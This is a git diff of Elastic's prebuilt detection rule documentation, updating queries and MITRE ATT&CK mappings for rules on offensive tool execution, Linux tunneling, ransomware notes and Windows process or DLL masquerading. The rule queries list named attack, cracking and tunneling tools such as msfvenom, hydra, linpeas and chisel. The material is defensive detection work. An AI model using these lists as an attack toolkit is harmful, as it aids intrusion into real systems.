+* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and +process.name in ( + // exploitation frameworks + "crackmapexec", "msfconsole", "msfvenom", "sliver-client", "sliver-server", "havoc", + // network scanners (nmap left out to reduce noise) + "zenmap", "nuclei", "netdiscover", "legion", + // web enumeration + "gobuster", "dirbuster", "dirb", "wfuzz", "ffuf", "whatweb", "eyewitness", + // web vulnerability scanning + "wpscan", "joomscan", "droopescan", "nikto", + // exploitation tools + "sqlmap", "commix", "yersinia", + // cracking and brute forcing + "john", "hashcat", "hydra", "ncrack", "cewl", "fcrackzip", "rainbowcrack", + // host and network + "linenum.sh", "linpeas.sh", "pspy32", "pspy32s", "pspy64", "pspy64s", "binwalk", "evil-winrm" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-local-account-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-local-account-brute-force-detected.asciidoc index f0ea302050..19d893a5c9 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-local-account-brute-force-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-local-account-brute-force-detected.asciidoc @@ -29,7 +29,7 @@ Identifies multiple consecutive login attempts executed by one process targeting * Tactic: Credential Access * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-ransomware-note-creation-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-ransomware-note-creation-detected.asciidoc index 8613f8b3c5..260502b9f2 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-ransomware-note-creation-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-ransomware-note-creation-detected.asciidoc @@ -29,7 +29,7 @@ This rule identifies a sequence of a mass file encryption event in conjunction w * Tactic: Impact * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -43,18 +43,12 @@ This rule identifies a sequence of a mass file encryption event in conjunction w [source, js] ---------------------------------- -sequence by host.id, process.entity_id with maxspan=1s +sequence by process.entity_id, host.id with maxspan=1s [file where host.os.type == "linux" and event.type == "change" and event.action == "rename" and file.extension : "?*" - and ((process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "ash", "openssl")) or - (process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*"))) and + and process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*") and file.path : ( "/home/*/Downloads/*", "/home/*/Documents/*", "/root/*", "/bin/*", "/usr/bin/*", - "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*") and not (( - process.name : ( - "dpkg", "yum", "dnf", "rpm", "dockerd", "go", "java", "pip*", "python*", "node", "containerd", "php", "p4d", - "conda", "chrome", "imap", "cmake", "firefox", "semanage", "semodule", "ansible-galaxy", "fc-cache", "jammy", "git", - "systemsettings", "vmis-launcher")) or (file.path : "/etc/selinux/*") or (file.extension in ("qmlc", "txt") - ))] with runs=25 + "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*")] with runs=25 [file where host.os.type == "linux" and event.action == "creation" and file.name : ( "*crypt*", "*restore*", "*lock*", "*recovery*", "*data*", "*read*", "*instruction*", "*how_to*", "*ransom*" )] diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-tunneling-and-or-port-forwarding.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-tunneling-and-or-port-forwarding.asciidoc index c86c782eb3..f2ae11ca42 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-tunneling-and-or-port-forwarding.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-tunneling-and-or-port-forwarding.asciidoc @@ -32,7 +32,7 @@ This rule monitors for a set of Linux utilities that can be used for tunneling a * Tactic: Command and Control * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -47,19 +47,21 @@ This rule monitors for a set of Linux utilities that can be used for tunneling a [source, js] ---------------------------------- process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and (( -// gost & pivotnacci - spawned without process.parent.name -(process.name == "gost" and process.args : ("-L*", "-C*", "-R*")) or (process.name == "pivotnacci")) or ( -// ssh -(process.name in ("ssh", "sshd") and (process.args in ("-R", "-L", "D", "-w") and process.args_count >= 4)) or -// sshuttle -(process.name == "sshuttle" and process.args in ("-r", "--remote", "-l", "--listen") and process.args_count >= 4) or -// socat -(process.name == "socat" and process.args : ("TCP4-LISTEN:*", "SOCKS*") and process.args_count >= 3) or -// chisel -(process.name : "chisel*" and process.args in ("client", "server")) or -// iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok -(process.name in ("iodine", "iodined", "dnscat", "hans", "hans-ubuntu", "ptunnel-ng", "ssf", "3proxy", "ngrok")) -) and process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")) + // gost & pivotnacci - spawned without process.parent.name + (process.name == "gost" and process.args : ("-L*", "-C*", "-R*")) or (process.name == "pivotnacci")) or ( + // ssh + (process.name in ("ssh", "sshd") and (process.args in ("-R", "-L", "D", "-w") and process.args_count >= 4 and + not process.args : "chmod")) or + // sshuttle + (process.name == "sshuttle" and process.args in ("-r", "--remote", "-l", "--listen") and process.args_count >= 4) or + // socat + (process.name == "socat" and process.args : ("TCP4-LISTEN:*", "SOCKS*") and process.args_count >= 3) or + // chisel + (process.name : "chisel*" and process.args in ("client", "server")) or + // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok + (process.name in ("iodine", "iodined", "dnscat", "hans", "hans-ubuntu", "ptunnel-ng", "ssf", "3proxy", "ngrok")) + ) and process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-local-ntlm-relay-via-http.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-local-ntlm-relay-via-http.asciidoc index 80d24aab6e..23b998dc0f 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-local-ntlm-relay-via-http.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-local-ntlm-relay-via-http.asciidoc @@ -34,10 +34,11 @@ Identifies attempt to coerce a local NTLM authentication via HTTP using the Wind * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -72,3 +73,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Exploitation for Credential Access ** ID: T1212 ** Reference URL: https://attack.mitre.org/techniques/T1212/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-browser-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-browser-process.asciidoc index a0cc95bdfa..062b3d9bd0 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-browser-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-browser-process.asciidoc @@ -27,10 +27,11 @@ Identifies suspicious instances of browser processes, such as unsigned or signed * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Rule Type: BBR * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -56,10 +57,26 @@ process where host.os.type == "windows" and event.type == "start" and (process.code_signature.subject_name : ("Google LLC", "Google Inc") and process.code_signature.trusted == true) and not ( - process.executable : "?:\\Program Files\\HP\\Sure Click\\servers\\chrome.exe" and + process.executable : ( + "?:\\Program Files\\HP\\Sure Click\\servers\\chrome.exe", + "?:\\Program Files\\HP\\Sure Click\\*\\servers\\chrome.exe" + ) and process.code_signature.subject_name : ("Bromium, Inc.") and process.code_signature.trusted == true - ) - and not process.hash.sha256 : "6538d54a236349f880d6793d219f558764629efc85d4d08b56b94717c01fb25a" + ) and + not ( + process.executable : ( + "?:\\Users\\*\\AppData\\Local\\ms-playwright\\chromium-*\\chrome-win\\chrome.exe", + "?:\\Users\\*\\AppData\\Local\\Programs\\synthetics-recorder\\resources\\local-browsers\\chromium-*\\chrome-win\\chrome.exe", + "*\\node_modules\\puppeteer\\.local-chromium\\win64-*\\chrome-win\\chrome.exe", + "?:\\Program Files (x86)\\Invicti Professional Edition\\chromium\\chrome.exe", + "?:\\Program Files\\End2End, Inc\\ARMS Html Engine\\chrome.exe", + "?:\\Users\\*\\AppData\\Local\\*BurpSuitePro\\burpbrowser\\*\\chrome.exe", + "?:\\Users\\*\\AppData\\Roaming\\*BurpSuite\\burpbrowser\\*\\chrome.exe" + ) and process.args: ( + "--enable-features=NetworkService,NetworkServiceInProcess", + "--type=crashpad-handler", "--enable-automation", "--disable-xss-auditor" + ) + ) ) or /* MS Edge Related Processes */ @@ -70,6 +87,11 @@ process where host.os.type == "windows" and event.type == "start" and "MicrosoftEdgeUpdateComRegisterShell64.exe", "msedgerecovery.exe", "MicrosoftEdgeUpdateSetup.exe" ) and not (process.code_signature.subject_name : "Microsoft Corporation" and process.code_signature.trusted == true) + and not + ( + process.name : "msedgewebview2.exe" and + process.code_signature.subject_name : ("Bromium, Inc.") and process.code_signature.trusted == true + ) ) or /* Brave Related Processes */ @@ -85,9 +107,14 @@ process where host.os.type == "windows" and event.type == "start" and (process.name : ( "firefox.exe", "pingsender.exe", "default-browser-agent.exe", "maintenanceservice.exe", "plugin-container.exe", "maintenanceservice_tmp.exe", "maintenanceservice_installer.exe", - "minidump-analyzer.exe", "crashreporter.exe" + "minidump-analyzer.exe" ) and not (process.code_signature.subject_name : "Mozilla Corporation" and process.code_signature.trusted == true) + and not + ( + process.name : "default-browser-agent.exe" and + process.code_signature.subject_name : ("WATERFOX LIMITED") and process.code_signature.trusted == true + ) ) or /* Island Related Processes */ @@ -124,7 +151,9 @@ process where host.os.type == "windows" and event.type == "start" and "Google LLC", "Google Inc", "Microsoft Corporation", - "NAVER Corp." + "NAVER Corp.", + "AVG Technologies USA, LLC", + "Avast Software s.r.o." ) and process.code_signature.trusted == true ) ) @@ -142,3 +171,19 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-business-app-installer.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-business-app-installer.asciidoc index 09f6d49571..3d87d4d879 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-business-app-installer.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-business-app-installer.asciidoc @@ -30,9 +30,11 @@ Identifies executables with names resembling legitimate business applications bu * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Initial Access +* Tactic: Execution * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -186,6 +188,14 @@ process where host.os.type == "windows" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ * Tactic: ** Name: Initial Access ** ID: TA0001 @@ -194,3 +204,15 @@ process where host.os.type == "windows" and ** Name: Drive-by Compromise ** ID: T1189 ** Reference URL: https://attack.mitre.org/techniques/T1189/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: User Execution +** ID: T1204 +** Reference URL: https://attack.mitre.org/techniques/T1204/ +* Sub-technique: +** Name: Malicious File +** ID: T1204.002 +** Reference URL: https://attack.mitre.org/techniques/T1204/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-communication-apps.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-communication-apps.asciidoc index a8cc04caae..6c36d2713d 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-communication-apps.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-communication-apps.asciidoc @@ -9,9 +9,9 @@ Identifies suspicious instances of communications apps, both unsigned and rename * logs-endpoint.events.* -*Severity*: low +*Severity*: medium -*Risk score*: 21 +*Risk score*: 47 *Runs every*: 5m @@ -27,10 +27,9 @@ Identifies suspicious instances of communications apps, both unsigned and rename * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion -* Rule Type: BBR * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -117,3 +116,19 @@ process where host.os.type == "windows" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc index 2e54b159ab..f0248aae83 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc @@ -28,9 +28,10 @@ Identifies suspicious instances of default system32 DLLs either unsigned or sign * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Rule Type: BBR -*Version*: 1 +*Version*: 102 *Rule authors*: @@ -44,7 +45,7 @@ Identifies suspicious instances of default system32 DLLs either unsigned or sign [source, js] ---------------------------------- -library where event.action == "load" and +library where event.action == "load" and dll.Ext.relative_file_creation_time <= 3600 and not ( dll.path : ( "?:\\Windows\\System32\\*", @@ -52,6 +53,8 @@ library where event.action == "load" and "?:\\Windows\\SystemTemp\\*", "?:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\*", "?:\\$WINDOWS.~BT\\NewOS\\Windows\\System32\\*", + "?:\\$WINDOWS.~BT\\Sources\\*", + "?:\\$WINDOWS.~BT\\Work\\*", "?:\\Windows\\WinSxS\\*", "?:\\Windows\\SoftwareDistribution\\Download\\*", "?:\\Windows\\assembly\\NativeImages_v*" @@ -71,8 +74,29 @@ library where event.action == "load" and "aadauthhelper.dll", "aadcloudap.dll", "aadjcsp.dll", "aadtb.dll", "aadwamextension.dll", "aarsvc.dll", "abovelockapphost.dll", "accessibilitycpl.dll", "accountaccessor.dll", "accountsrt.dll", "acgenral.dll", "aclayers.dll", "acledit.dll", "aclui.dll", "acmigration.dll", "acppage.dll", "acproxy.dll", "acspecfc.dll", "actioncenter.dll", "actioncentercpl.dll", "actionqueue.dll", "activationclient.dll", "activeds.dll", "activesynccsp.dll", "actxprxy.dll", "acwinrt.dll", "acxtrnal.dll", "adaptivecards.dll", "addressparser.dll", "adhapi.dll", "adhsvc.dll", "admtmpl.dll", "adprovider.dll", "adrclient.dll", "adsldp.dll", "adsldpc.dll", "adsmsext.dll", "adsnt.dll", "adtschema.dll", "advancedemojids.dll", "advapi32.dll", "advapi32res.dll", "advpack.dll", "aeevts.dll", "aeinv.dll", "aepic.dll", "ajrouter.dll", "altspace.dll", "amsi.dll", "amsiproxy.dll", "amstream.dll", "apds.dll", "aphostclient.dll", "aphostres.dll", "aphostservice.dll", "apisampling.dll", "apisetschema.dll", "apmon.dll", "apmonui.dll", "appcontracts.dll", "appextension.dll", "apphelp.dll", "apphlpdm.dll", "appidapi.dll", "appidsvc.dll", "appinfo.dll", "appinfoext.dll", "applicationframe.dll", "applockercsp.dll", "appmgmts.dll", "appmgr.dll", "appmon.dll", "appointmentapis.dll", "appraiser.dll", "appreadiness.dll", "apprepapi.dll", "appresolver.dll", "appsruprov.dll", "appvcatalog.dll", "appvclientps.dll", "appvetwclientres.dll", "appvintegration.dll", "appvmanifest.dll", "appvpolicy.dll", "appvpublishing.dll", "appvreporting.dll", "appvscripting.dll", "appvsentinel.dll", "appvstreamingux.dll", "appvstreammap.dll", "appvterminator.dll", "appxalluserstore.dll", "appxpackaging.dll", "appxsip.dll", "appxsysprep.dll", "archiveint.dll", "asferror.dll", "aspnet_counters.dll", "asycfilt.dll", "atl.dll", "atlthunk.dll", "atmlib.dll", "audioeng.dll", "audiohandlers.dll", "audiokse.dll", "audioses.dll", "audiosrv.dll", "auditcse.dll", "auditpolcore.dll", "auditpolmsg.dll", "authbroker.dll", "authbrokerui.dll", "authentication.dll", "authext.dll", "authfwcfg.dll", "authfwgp.dll", "authfwsnapin.dll", "authfwwizfwk.dll", "authhostproxy.dll", "authui.dll", "authz.dll", "autopilot.dll", "autopilotdiag.dll", "autoplay.dll", "autotimesvc.dll", "avicap32.dll", "avifil32.dll", "avrt.dll", "axinstsv.dll", "azroles.dll", "azroleui.dll", "azsqlext.dll", "basecsp.dll", "basesrv.dll", "batmeter.dll", "bcastdvrbroker.dll", "bcastdvrclient.dll", "bcastdvrcommon.dll", "bcd.dll", "bcdprov.dll", "bcdsrv.dll", "bcp47langs.dll", "bcp47mrm.dll", "bcrypt.dll", "bcryptprimitives.dll", "bdehdcfglib.dll", "bderepair.dll", "bdesvc.dll", "bdesysprep.dll", "bdeui.dll", "bfe.dll", "bi.dll", "bidispl.dll", "bindfltapi.dll", "bingasds.dll", "bingfilterds.dll", "bingmaps.dll", "biocredprov.dll", "bisrv.dll", "bitlockercsp.dll", "bitsigd.dll", "bitsperf.dll", "bitsproxy.dll", "biwinrt.dll", "blbevents.dll", "blbres.dll", "blb_ps.dll", "bluetoothapis.dll", "bnmanager.dll", "bootmenuux.dll", "bootstr.dll", "bootux.dll", "bootvid.dll", "bridgeres.dll", "brokerlib.dll", "browcli.dll", "browserbroker.dll", "browseui.dll", "btagservice.dll", "bthavctpsvc.dll", "bthavrcp.dll", "bthavrcpappsvc.dll", "bthci.dll", "bthpanapi.dll", "bthradiomedia.dll", "bthserv.dll", "bthtelemetry.dll", "btpanui.dll", "bwcontexthandler.dll", "cabapi.dll", "cabinet.dll", "cabview.dll", "callbuttons.dll", "cameracaptureui.dll", "capauthz.dll", "capiprovider.dll", "capisp.dll", "captureservice.dll", "castingshellext.dll", "castlaunch.dll", "catsrv.dll", "catsrvps.dll", "catsrvut.dll", "cbdhsvc.dll", "cca.dll", "cdd.dll", "cdosys.dll", "cdp.dll", "cdprt.dll", "cdpsvc.dll", "cdpusersvc.dll", "cemapi.dll", "certca.dll", "certcli.dll", "certcredprovider.dll", "certenc.dll", "certenroll.dll", "certenrollui.dll", "certmgr.dll", "certpkicmdlet.dll", "certpoleng.dll", "certprop.dll", "cewmdm.dll", "cfgbkend.dll", "cfgmgr32.dll", "cfgspcellular.dll", "cfgsppolicy.dll", "cflapi.dll", "cfmifs.dll", "cfmifsproxy.dll", "chakra.dll", "chakradiag.dll", "chakrathunk.dll", "chartv.dll", "chatapis.dll", "chkwudrv.dll", "chsstrokeds.dll", "chtbopomofods.dll", "chtcangjieds.dll", "chthkstrokeds.dll", "chtquickds.dll", "chxapds.dll", "chxdecoder.dll", "chxhapds.dll", "chxinputrouter.dll", "chxranker.dll", "ci.dll", "cic.dll", "cimfs.dll", "circoinst.dll", "ciwmi.dll", "clb.dll", "clbcatq.dll", "cldapi.dll", "cleanpccsp.dll", "clfsw32.dll", "cliconfg.dll", "clipboardserver.dll", "clipc.dll", "clipsvc.dll", "clipwinrt.dll", "cloudap.dll", "cloudidsvc.dll", "clrhost.dll", "clusapi.dll", "cmcfg32.dll", "cmdext.dll", "cmdial32.dll", "cmgrcspps.dll", "cmifw.dll", "cmintegrator.dll", "cmlua.dll", "cmpbk32.dll", "cmstplua.dll", "cmutil.dll", "cngcredui.dll", "cngprovider.dll", "cnvfat.dll", "cofiredm.dll", "colbact.dll", "colorcnv.dll", "colorui.dll", "combase.dll", "comcat.dll", "comctl32.dll", "comdlg32.dll", "coml2.dll", "comppkgsup.dll", "compstui.dll", "computecore.dll", "computenetwork.dll", "computestorage.dll", "comrepl.dll", "comres.dll", "comsnap.dll", "comsvcs.dll", "comuid.dll", "configmanager2.dll", "conhostv1.dll", "connect.dll", "consentux.dll", "consentuxclient.dll", "console.dll", "consolelogon.dll", "contactapis.dll", "container.dll", "coredpus.dll", "coreglobconfig.dll", "coremas.dll", "coremessaging.dll", "coremmres.dll", "coreshell.dll", "coreshellapi.dll", "coreuicomponents.dll", "correngine.dll", "courtesyengine.dll", "cpfilters.dll", "creddialogbroker.dll", "credprovhelper.dll", "credprovhost.dll", "credprovs.dll", "credprovslegacy.dll", "credssp.dll", "credui.dll", "crypt32.dll", "cryptbase.dll", "cryptcatsvc.dll", "cryptdlg.dll", "cryptdll.dll", "cryptext.dll", "cryptnet.dll", "cryptngc.dll", "cryptowinrt.dll", "cryptsp.dll", "cryptsvc.dll", "crypttpmeksvc.dll", "cryptui.dll", "cryptuiwizard.dll", "cryptxml.dll", "cscapi.dll", "cscdll.dll", "cscmig.dll", "cscobj.dll", "cscsvc.dll", "cscui.dll", "csplte.dll", "cspproxy.dll", "csrsrv.dll", "cxcredprov.dll", "c_g18030.dll", "c_gsm7.dll", "c_is2022.dll", "c_iscii.dll", "d2d1.dll", "d3d10.dll", "d3d10core.dll", "d3d10level9.dll", "d3d10warp.dll", "d3d10_1.dll", "d3d10_1core.dll", "d3d11.dll", "d3d11on12.dll", "d3d12.dll", "d3d12core.dll", "d3d8thk.dll", "d3d9.dll", "d3d9on12.dll", "d3dscache.dll", "dab.dll", "dabapi.dll", "daconn.dll", "dafbth.dll", "dafdnssd.dll", "dafescl.dll", "dafgip.dll", "dafiot.dll", "dafipp.dll", "dafmcp.dll", "dafpos.dll", "dafprintprovider.dll", "dafupnp.dll", "dafwcn.dll", "dafwfdprovider.dll", "dafwiprov.dll", "dafwsd.dll", "damediamanager.dll", "damm.dll", "das.dll", "dataclen.dll", "datusage.dll", "davclnt.dll", "davhlpr.dll", "davsyncprovider.dll", "daxexec.dll", "dbgcore.dll", "dbgeng.dll", "dbghelp.dll", "dbgmodel.dll", "dbnetlib.dll", "dbnmpntw.dll", "dciman32.dll", "dcntel.dll", "dcomp.dll", "ddaclsys.dll", "ddcclaimsapi.dll", "ddds.dll", "ddisplay.dll", "ddoiproxy.dll", "ddores.dll", "ddpchunk.dll", "ddptrace.dll", "ddputils.dll", "ddp_ps.dll", "ddraw.dll", "ddrawex.dll", "defragproxy.dll", "defragres.dll", "defragsvc.dll", "deploymentcsps.dll", "deskadp.dll", "deskmon.dll", "desktopshellext.dll", "devenum.dll", "deviceaccess.dll", "devicecenter.dll", "devicecredential.dll", "devicepairing.dll", "deviceuxres.dll", "devinv.dll", "devmgr.dll", "devobj.dll", "devpropmgr.dll", "devquerybroker.dll", "devrtl.dll", "dfdts.dll", "dfscli.dll", "dfshim.dll", "dfsshlex.dll", "dggpext.dll", "dhcpcmonitor.dll", "dhcpcore.dll", "dhcpcore6.dll", "dhcpcsvc.dll", "dhcpcsvc6.dll", "dhcpsapi.dll", "diagcpl.dll", "diagnosticlogcsp.dll", "diagperf.dll", "diagsvc.dll", "diagtrack.dll", "dialclient.dll", "dialserver.dll", "dictationmanager.dll", "difxapi.dll", "dimsjob.dll", "dimsroam.dll", "dinput.dll", "dinput8.dll", "direct2ddesktop.dll", "directml.dll", "discan.dll", "dismapi.dll", "dispbroker.dll", "dispex.dll", "display.dll", "displaymanager.dll", "dlnashext.dll", "dmappsres.dll", "dmcfgutils.dll", "dmcmnutils.dll", "dmcsps.dll", "dmdlgs.dll", "dmdskmgr.dll", "dmdskres.dll", "dmdskres2.dll", "dmenrollengine.dll", "dmintf.dll", "dmiso8601utils.dll", "dmloader.dll", "dmocx.dll", "dmoleaututils.dll", "dmpushproxy.dll", "dmpushroutercore.dll", "dmrcdecoder.dll", "dmrserver.dll", "dmsynth.dll", "dmusic.dll", "dmutil.dll", "dmvdsitf.dll", "dmwappushsvc.dll", "dmwmicsp.dll", "dmxmlhelputils.dll", "dnsapi.dll", "dnscmmc.dll", "dnsext.dll", "dnshc.dll", "dnsrslvr.dll", "docprop.dll", "dolbydecmft.dll", "domgmt.dll", "dosettings.dll", "dosvc.dll", "dot3api.dll", "dot3cfg.dll", "dot3conn.dll", "dot3dlg.dll", "dot3gpclnt.dll", "dot3gpui.dll", "dot3hc.dll", "dot3mm.dll", "dot3msm.dll", "dot3svc.dll", "dot3ui.dll", "dpapi.dll", "dpapiprovider.dll", "dpapisrv.dll", "dpnaddr.dll", "dpnathlp.dll", "dpnet.dll", "dpnhpast.dll", "dpnhupnp.dll", "dpnlobby.dll", "dps.dll", "dpx.dll", "drprov.dll", "drt.dll", "drtprov.dll", "drttransport.dll", "drvsetup.dll", "drvstore.dll", "dsauth.dll", "dsccore.dll", "dsccoreconfprov.dll", "dsclient.dll", "dscproxy.dll", "dsctimer.dll", "dsdmo.dll", "dskquota.dll", "dskquoui.dll", "dsound.dll", "dsparse.dll", "dsprop.dll", "dsquery.dll", "dsreg.dll", "dsregtask.dll", "dsrole.dll", "dssec.dll", "dssenh.dll", "dssvc.dll", "dsui.dll", "dsuiext.dll", "dswave.dll", "dtsh.dll", "ducsps.dll", "dui70.dll", "duser.dll", "dusmapi.dll", "dusmsvc.dll", "dwmapi.dll", "dwmcore.dll", "dwmghost.dll", "dwminit.dll", "dwmredir.dll", "dwmscene.dll", "dwrite.dll", "dxcore.dll", "dxdiagn.dll", "dxgi.dll", "dxgwdi.dll", "dxilconv.dll", "dxmasf.dll", "dxp.dll", "dxpps.dll", "dxptasksync.dll", "dxtmsft.dll", "dxtrans.dll", "dxva2.dll", "dynamoapi.dll", "eapp3hst.dll", "eappcfg.dll", "eappcfgui.dll", "eappgnui.dll", "eapphost.dll", "eappprxy.dll", "eapprovp.dll", "eapputil.dll", "eapsimextdesktop.dll", "eapsvc.dll", "eapteapauth.dll", "eapteapconfig.dll", "eapteapext.dll", "easconsent.dll", "easwrt.dll", "edgeangle.dll", "edgecontent.dll", "edgehtml.dll", "edgeiso.dll", "edgemanager.dll", "edpauditapi.dll", "edpcsp.dll", "edptask.dll", "edputil.dll", "eeprov.dll", "eeutil.dll", "efsadu.dll", "efscore.dll", "efsext.dll", "efslsaext.dll", "efssvc.dll", "efsutil.dll", "efswrt.dll", "ehstorapi.dll", "ehstorpwdmgr.dll", "ehstorshell.dll", "els.dll", "elscore.dll", "elshyph.dll", "elslad.dll", "elstrans.dll", "emailapis.dll", "embeddedmodesvc.dll", "emojids.dll", "encapi.dll", "energy.dll", "energyprov.dll", "energytask.dll", "enrollmentapi.dll", "enterpriseapncsp.dll", "enterprisecsps.dll", "enterpriseetw.dll", "eqossnap.dll", "errordetails.dll", "errordetailscore.dll", "es.dll", "esclprotocol.dll", "esclscan.dll", "esclwiadriver.dll", "esdsip.dll", "esent.dll", "esentprf.dll", "esevss.dll", "eshims.dll", "etwrundown.dll", "euiccscsp.dll", "eventaggregation.dll", "eventcls.dll", "evr.dll", "execmodelclient.dll", "execmodelproxy.dll", "explorerframe.dll", "exsmime.dll", "extrasxmlparser.dll", "f3ahvoas.dll", "facilitator.dll", "familysafetyext.dll", "faultrep.dll", "fcon.dll", "fdbth.dll", "fdbthproxy.dll", "fddevquery.dll", "fde.dll", "fdeploy.dll", "fdphost.dll", "fdpnp.dll", "fdprint.dll", "fdproxy.dll", "fdrespub.dll", "fdssdp.dll", "fdwcn.dll", "fdwnet.dll", "fdwsd.dll", "feclient.dll", "ffbroker.dll", "fhcat.dll", "fhcfg.dll", 